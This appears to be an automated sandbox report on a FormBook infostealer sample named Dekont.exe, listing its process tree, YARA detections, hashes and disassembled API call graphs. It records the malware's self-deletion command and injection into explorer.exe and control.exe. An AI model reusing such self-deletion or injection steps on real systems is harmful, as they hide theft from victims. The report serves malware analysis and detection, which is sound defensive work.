                                Commandline:"C:\Users\user\Desktop\Dekont.exe"
                                Imagebase:0x4a0000
                                File size:604'672 bytes
                                MD5 hash:DA966801158EA63939A23E310275241A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000005.00000002.2142589404.0000000000EDF000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:6
                                Start time:02:57:03
                                Start date:25/09/2024
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Explorer.EXE
                                Imagebase:0x7ff674740000
                                File size:5'141'208 bytes
                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000006.00000002.4538701995.000000000E768000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:7
                                Start time:02:57:05
                                Start date:25/09/2024
                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Imagebase:0x7ff6ef0c0000
                                File size:496'640 bytes
                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                Has elevated privileges:true
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:8
                                Start time:02:57:07
                                Start date:25/09/2024
                                Path:C:\Windows\SysWOW64\control.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\SysWOW64\control.exe"
                                Imagebase:0x870000
                                File size:149'504 bytes
                                MD5 hash:EBC29AA32C57A54018089CFC9CACAFE8
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:moderate
                                Has exited:false

                                General

                                Target ID:9
                                Start time:02:57:10
                                Start date:25/09/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:/c del "C:\Users\user\Desktop\Dekont.exe"
                                Imagebase:0x790000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:10
                                Start time:02:57:11
                                Start date:25/09/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:8.6%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:76
                                  Total number of Limit Nodes:6
                                  execution_graph 15237 271d751 15238 271d714 DuplicateHandle 15237->15238 15240 271d75a 15237->15240 15239 271d726 15238->15239 15241 271d040 15242 271d086 GetCurrentProcess 15241->15242 15244 271d0d1 15242->15244 15245 271d0d8 GetCurrentThread 15242->15245 15244->15245 15246 271d115 GetCurrentProcess 15245->15246 15247 271d10e 15245->15247 15248 271d14b 15246->15248 15247->15246 15249 271d173 GetCurrentThreadId 15248->15249 15250 271d1a4 15249->15250 15251 2714668 15252 271467a 15251->15252 15253 2714686 15252->15253 15257 2714778 15252->15257 15262 2713e28 15253->15262 15255 27146a5 15258 271479d 15257->15258 15266 2714878 15258->15266 15270 2714888 15258->15270 15263 2713e33 15262->15263 15278 2715c44 15263->15278 15265 2717048 15265->15255 15267 27148af 15266->15267 15268 271498c 15267->15268 15274 27144b0 15267->15274 15272 27148af 15270->15272 15271 271498c 15271->15271 15272->15271 15273 27144b0 CreateActCtxA 15272->15273 15273->15271 15275 2715918 CreateActCtxA 15274->15275 15277 27159db 15275->15277 15279 2715c4f 15278->15279 15282 2715c64 15279->15282 15281 27170ed 15281->15265 15283 2715c6f 15282->15283 15286 2715c94 15283->15286 15285 27171c2 15285->15281 15287 2715c9f 15286->15287 15290 2715cc4 15287->15290 15289 27172c5 15289->15285 15291 2715ccf 15290->15291 15293 27185cb 15291->15293 15296 271ac78 15291->15296 15292 2718609 15292->15289 15293->15292 15300 271cd68 15293->15300 15306 271acb0 15296->15306 15309 271aca0 15296->15309 15297 271ac8e 15297->15293 15301 271cd60 15300->15301 15302 271cd76 15300->15302 15301->15292 15303 271cdbd 15302->15303 15318 271cf28 15302->15318 15322 271cf18 15302->15322 15303->15292 15313 271ada8 15306->15313 15307 271acbf 15307->15297 15310 271acb0 15309->15310 15312 271ada8 GetModuleHandleW 15310->15312 15311 271acbf 15311->15297 15312->15311 15314 271addc 15313->15314 15316 271adb9 15313->15316 15314->15307 15315 271afe0 GetModuleHandleW 15317 271b00d 15315->15317 15316->15314 15316->15315 15317->15307 15319 271cf35 15318->15319 15320 271cf6f 15319->15320 15326 271bae0 15319->15326 15320->15303 15323 271cf35 15322->15323 15324 271cf6f 15323->15324 15325 271bae0 GetModuleHandleW 15323->15325 15324->15303 15325->15324 15327 271bae5 15326->15327 15329 271dc88 15327->15329 15330 271d2dc 15327->15330 15329->15329 15331 271d2e7 15330->15331 15332 2715cc4 GetModuleHandleW 15331->15332 15333 271dcf7 15332->15333 15333->15329

                                  Executed Functions

                                  Function 0271D030 Relevance: 6.1, APIs: 4, Instructions: 135threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 294 271d030-271d0cf GetCurrentProcess 298 271d0d1-271d0d7 294->298 299 271d0d8-271d10c GetCurrentThread 294->299 298->299 300 271d115-271d149 GetCurrentProcess 299->300 301 271d10e-271d114 299->301 302 271d152-271d16d call 271d619 300->302 303 271d14b-271d151 300->303 301->300 307 271d173-271d1a2 GetCurrentThreadId 302->307 303->302 308 271d1a4-271d1aa 307->308 309 271d1ab-271d20d 307->309 308->309
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 0271D0BE
                                  • GetCurrentThread.KERNEL32 ref: 0271D0FB
                                  • GetCurrentProcess.KERNEL32 ref: 0271D138
                                  • GetCurrentThreadId.KERNEL32 ref: 0271D191
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066657375.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2710000_Dekont.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: d4893dc8569401f4ffd9a0c60c40e7236dae77dc8b529c9a30025351e8e61ee5
                                  • Instruction ID: c188d093ebfb1aa74634e818c0b832262a69775bfb4bbd0fd37b04193af433bf
                                  • Opcode Fuzzy Hash: d4893dc8569401f4ffd9a0c60c40e7236dae77dc8b529c9a30025351e8e61ee5
                                  • Instruction Fuzzy Hash: 8B5167B0A013498FDB14CFA9D988B9EBBF1EF48314F248459E419A7351D734A944CF65
                                  Function 0271D040 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 316 271d040-271d0cf GetCurrentProcess 320 271d0d1-271d0d7 316->320 321 271d0d8-271d10c GetCurrentThread 316->321 320->321 322 271d115-271d149 GetCurrentProcess 321->322 323 271d10e-271d114 321->323 324 271d152-271d16d call 271d619 322->324 325 271d14b-271d151 322->325 323->322 329 271d173-271d1a2 GetCurrentThreadId 324->329 325->324 330 271d1a4-271d1aa 329->330 331 271d1ab-271d20d 329->331 330->331
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 0271D0BE
                                  • GetCurrentThread.KERNEL32 ref: 0271D0FB
                                  • GetCurrentProcess.KERNEL32 ref: 0271D138
                                  • GetCurrentThreadId.KERNEL32 ref: 0271D191
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066657375.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2710000_Dekont.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: ff1d17aed402984c2d0829463bd9fb62404b74d7f5d721d924f777b9386c6eae
                                  • Instruction ID: 2566b24d1ba9ec6e76bcd84fad2904dce70bb84557c64442f669574208a55967
                                  • Opcode Fuzzy Hash: ff1d17aed402984c2d0829463bd9fb62404b74d7f5d721d924f777b9386c6eae
                                  • Instruction Fuzzy Hash: EF5157B0A003498FDB14DFA9D988B9EBBF1FF48314F208459E419A7351D734A944CF65
                                  Function 0271ADA8 Relevance: 1.7, APIs: 1, Instructions: 210COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 375 271ada8-271adb7 376 271ade3-271ade7 375->376 377 271adb9-271adc6 call 271a0cc 375->377 378 271ade9-271adf3 376->378 379 271adfb-271ae3c 376->379 384 271adc8 377->384 385 271addc 377->385 378->379 386 271ae49-271ae57 379->386 387 271ae3e-271ae46 379->387 432 271adce call 271b040 384->432 433 271adce call 271b030 384->433 385->376 389 271ae59-271ae5e 386->389 390 271ae7b-271ae7d 386->390 387->386 388 271add4-271add6 388->385 391 271af18-271af94 388->391 393 271ae60-271ae67 call 271a0d8 389->393 394 271ae69 389->394 392 271ae80-271ae87 390->392 425 271afc0-271afd8 391->425 426 271af96-271afbe 391->426 396 271ae94-271ae9b 392->396 397 271ae89-271ae91 392->397 395 271ae6b-271ae79 393->395 394->395 395->392 399 271aea8-271aeaa call 271a0e8 396->399 400 271ae9d-271aea5 396->400 397->396 404 271aeaf-271aeb1 399->404 400->399 406 271aeb3-271aebb 404->406 407 271aebe-271aec3 404->407 406->407 408 271aee1-271aeee 407->408 409 271aec5-271aecc 407->409 415 271af11-271af17 408->415 416 271aef0-271af0e 408->416 409->408 411 271aece-271aede call 271a0f8 call 271a108 409->411 411->408 416->415 427 271afe0-271b00b GetModuleHandleW 425->427 428 271afda-271afdd 425->428 426->425 429 271b014-271b028 427->429 430 271b00d-271b013 427->430 428->427 430->429 432->388 433->388
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0271AFFE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066657375.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2710000_Dekont.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 8ad1cc6d068faec617b04f14d36421fbe79fa447f81428513790152adcfaeb55
                                  • Instruction ID: 730d29a058de29a9d2c2202826b9d56fc8c421e9c1757fe491bf6e808382c85f
                                  • Opcode Fuzzy Hash: 8ad1cc6d068faec617b04f14d36421fbe79fa447f81428513790152adcfaeb55
                                  • Instruction Fuzzy Hash: 9F8158B0A01B058FDB25DF2AD44579ABBF5FF88304F00892DD48ADBA50D775E94ACB90
                                  Function 0271590C Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 434 271590c-27159d9 CreateActCtxA 436 27159e2-2715a3c 434->436 437 27159db-27159e1 434->437 444 2715a4b-2715a4f 436->444 445 2715a3e-2715a41 436->445 437->436 446 2715a51-2715a5d 444->446 447 2715a60 444->447 445->444 446->447 449 2715a61 447->449 449->449
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 027159C9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066657375.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2710000_Dekont.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: f532f521294a1ce9ea5db50fb35eee15f37831457952235462e5f1a8a2993a87
                                  • Instruction ID: f4e8c5d65ecfd22fdd0f7ef9ba9f157d1a3e83c8a4ce413dce844eb764197a2d
                                  • Opcode Fuzzy Hash: f532f521294a1ce9ea5db50fb35eee15f37831457952235462e5f1a8a2993a87
                                  • Instruction Fuzzy Hash: 9B41E0B1C00719CEDB24CFA9C884ADDBBF5BF89304F64816AD409AB251DB75694ACF50
                                  Function 027144B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 450 27144b0-27159d9 CreateActCtxA 453 27159e2-2715a3c 450->453 454 27159db-27159e1 450->454 461 2715a4b-2715a4f 453->461 462 2715a3e-2715a41 453->462 454->453 463 2715a51-2715a5d 461->463 464 2715a60 461->464 462->461 463->464 466 2715a61 464->466 466->466
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 027159C9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066657375.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2710000_Dekont.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 5ddfaada4cdfca08f3045201dd9f6624b2300e4fcd413fcd313d66f802184a47
                                  • Instruction ID: 9f686590dd65f447c85469e3fe64c77ddb6d45d619ef56b11539b183abb55151
                                  • Opcode Fuzzy Hash: 5ddfaada4cdfca08f3045201dd9f6624b2300e4fcd413fcd313d66f802184a47
                                  • Instruction Fuzzy Hash: 3141D2B1C0071DCFDB24CFA9C884A9EBBF5BF88304F60815AD409AB255DB756949CF91
                                  Function 0271D751 Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 467 271d751-271d758 468 271d714-271d724 DuplicateHandle 467->468 469 271d75a-271d87e 467->469 471 271d726-271d72c 468->471 472 271d72d-271d74a 468->472 471->472
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0271D717
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066657375.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2710000_Dekont.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 45522aa76bf54b6c988ae3baf422b14419d61cf72d9ac8553ba587f2ca1f4864
                                  • Instruction ID: e416d464176cf3db67122aa2e51ecef7e0788259ec85dc2ebc2e6bea11201445
                                  • Opcode Fuzzy Hash: 45522aa76bf54b6c988ae3baf422b14419d61cf72d9ac8553ba587f2ca1f4864
                                  • Instruction Fuzzy Hash: 61319238A803808FE311AF60F455B697BA5FBC4714F208579EA518B3C8EBB40865CF10
                                  Function 0271D688 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 485 271d688-271d724 DuplicateHandle 486 271d726-271d72c 485->486 487 271d72d-271d74a 485->487 486->487
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0271D717
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066657375.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2710000_Dekont.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: db5894ca9a5e0fc33e5d1fe682cf9cca8b1a6047f36c2043e6ba5eb00d457c10
                                  • Instruction ID: 7df2c327665d7df76618a7cc26400a670cb72cacddf6db46dc64f231cf3c1675
                                  • Opcode Fuzzy Hash: db5894ca9a5e0fc33e5d1fe682cf9cca8b1a6047f36c2043e6ba5eb00d457c10
                                  • Instruction Fuzzy Hash: FC2103B59012099FDB10CFAAD984ADEFBF4EF48310F14801AE918A3210D374A941CFA1
                                  Function 0271D690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 490 271d690-271d724 DuplicateHandle 491 271d726-271d72c 490->491 492 271d72d-271d74a 490->492 491->492
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0271D717
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066657375.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2710000_Dekont.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: dffe14f691b8003e916c1f468abc4fd1585a8c4ae0b104d03117d75c5d316466
                                  • Instruction ID: 080e2051835ce3d00487ca5fdf46ae2c218662bf35746a1cb74b16ad851dd389
                                  • Opcode Fuzzy Hash: dffe14f691b8003e916c1f468abc4fd1585a8c4ae0b104d03117d75c5d316466
                                  • Instruction Fuzzy Hash: C721C4B59002499FDB10CF9AD984ADEBBF8EF48310F14841AE914A3350D375A954DFA5
                                  Function 0271AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 495 271af98-271afd8 496 271afe0-271b00b GetModuleHandleW 495->496 497 271afda-271afdd 495->497 498 271b014-271b028 496->498 499 271b00d-271b013 496->499 497->496 499->498
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0271AFFE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066657375.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2710000_Dekont.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: d2db5bf4559132b5e07213db1ad44b2953047d73bc68833e69d38359531cea97
                                  • Instruction ID: f8e9fa93bba4eadb8aec3bcefc0f4ea036d3b5b7bcda93ef714a4019f98b8c3c
                                  • Opcode Fuzzy Hash: d2db5bf4559132b5e07213db1ad44b2953047d73bc68833e69d38359531cea97
                                  • Instruction Fuzzy Hash: FA1110B6C003498FCB20CF9AC944ADEFBF8EF88324F10842AD529A7210D375A545CFA1
                                  Function 00C3D3D8 Relevance: .1, Instructions: 75COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066116357.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c3d000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c133d62bf5f935cf17bb4130b1058c035fd579b0a233f89a865acaeb8c1eb88d
                                  • Instruction ID: 1c4e8079101b35b40864967768442644661506254bc0d01717b9f25d29956e9b
                                  • Opcode Fuzzy Hash: c133d62bf5f935cf17bb4130b1058c035fd579b0a233f89a865acaeb8c1eb88d
                                  • Instruction Fuzzy Hash: 362129B5514204DFDB05DF14E9C0B26BF65FB98324F24C56DE90B0B25AC33AE856CBA2
                                  Function 025ED01C Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066469761.00000000025ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 025ED000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_25ed000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 31a3ac24587f3b103e3209ef5ba9b33451a54a3376886d532383c84dd75e5bd3
                                  • Instruction ID: d039adb8f735d59926dad75407e5fdd9af087480f4597839b931b7c6ec5acfa7
                                  • Opcode Fuzzy Hash: 31a3ac24587f3b103e3209ef5ba9b33451a54a3376886d532383c84dd75e5bd3
                                  • Instruction Fuzzy Hash: FE21D075605204DFDF19DF14D984B26BFB9FB88324F28C969D80A4B246D33BD806CA65
                                  Function 025ED1D4 Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066469761.00000000025ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 025ED000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_25ed000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 83518376221d756a59360232b9725d86ece8e332b54c21a8d03e5c37e85eeeeb
                                  • Instruction ID: 530cc7e0e331cf57753a1062e2a1794b4b30e4c6ee47e21eb4297a6ed2945337
                                  • Opcode Fuzzy Hash: 83518376221d756a59360232b9725d86ece8e332b54c21a8d03e5c37e85eeeeb
                                  • Instruction Fuzzy Hash: 91210775504200DFDF09DF14D9C0B26BF79FB88314F24C9ADD80A4B296C33AD406CA65
                                  Function 025ED006 Relevance: .1, Instructions: 62COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066469761.00000000025ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 025ED000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_25ed000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 04ba003bb872f166549bd4b6ae82d21b8cfc749d4f7628e3b6573c994aabc122
                                  • Instruction ID: dc70ef7234d8c1cad43be0409207ef4fe97d4e1dbf2444dfac14e56f7061378a
                                  • Opcode Fuzzy Hash: 04ba003bb872f166549bd4b6ae82d21b8cfc749d4f7628e3b6573c994aabc122
                                  • Instruction Fuzzy Hash: 3D215E755093808FDB16CF24D994715BF71FB46214F28C5DAD8898B6A7C33A980ACB62
                                  Function 00C3D3D3 Relevance: .1, Instructions: 56COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066116357.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c3d000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                  • Instruction ID: 20603a2156d799b4d1abd4e8b9b36646d7515c6967506d8c34040d7ec2ce0bdb
                                  • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                  • Instruction Fuzzy Hash: 53110376404240CFCB02CF10E5C4B16BF71FB94324F24C2A9D80A0B256C33AE95ACBA1
                                  Function 025ED1CF Relevance: .1, Instructions: 53COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066469761.00000000025ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 025ED000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_25ed000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                  • Instruction ID: 8bffca08286d38bdccab2a29e8c5dd6a4e4868c17a2c5ff115cb624f02aafe06
                                  • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                  • Instruction Fuzzy Hash: 6A118B7A904280DFDB16CF14D6C4B15BFB1FB84314F24C6ADD84A4B696C33AD44ACB61
                                  Function 00C3D745 Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066116357.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c3d000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 93d5c1875a51ed04caf4400a811502397d5f6e178e764dcd969756cd83686d31
                                  • Instruction ID: e9435037b4033a2c9bc72e7469fd620c44cfd7e5e827bc58ffda34ec350b0fc1
